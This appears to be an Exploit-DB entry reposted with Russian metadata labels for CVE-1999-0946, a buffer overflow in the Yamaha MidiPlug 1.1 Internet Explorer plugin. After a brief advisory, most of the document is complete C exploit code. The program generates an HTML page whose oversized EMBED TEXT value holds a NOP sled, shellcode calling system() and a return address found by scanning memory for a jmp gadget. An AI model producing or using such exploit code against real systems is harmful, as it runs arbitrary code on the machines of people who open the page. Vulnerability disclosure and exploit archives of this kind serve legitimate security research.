- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19585
- Проверка EDB
-
- Пройдено
- Автор
- UNYUN
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-1999-0946
- Дата публикации
- 1999-11-02
Yamaha MidiPlug 1.1 b-j MidiPlug - Local Buffer Overflow
C:
// source: https://www.securityfocus.com/bid/760/info
There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page.
/*=============================================================================
YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 700
#define RETADR 256
unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};
unsigned char exploit_code[200]={
0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
};
unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
main(int argc,char *argv[])
{
FILE *fp;
unsigned int i,ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfile\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
for (i=0;;i+=2){
if (mems[i]==0){
printf("Can not find jmp code.\n");
exit(1);
}
if ((ip=search_mem(fp,(unsigned char *)mems[i],
(unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
}
printf("Jumping address : %x\n",ip);
memset(buf,0x90,MAXBUF);
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strcat(exploit_code,cmdbuf);
memcpy(buf,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s\"\n>\n</HTML>",buf);
fclose(fp);
printf("%s created.\n",argv[1]);
return FALSE;
}
- Источник
- www.exploit-db.com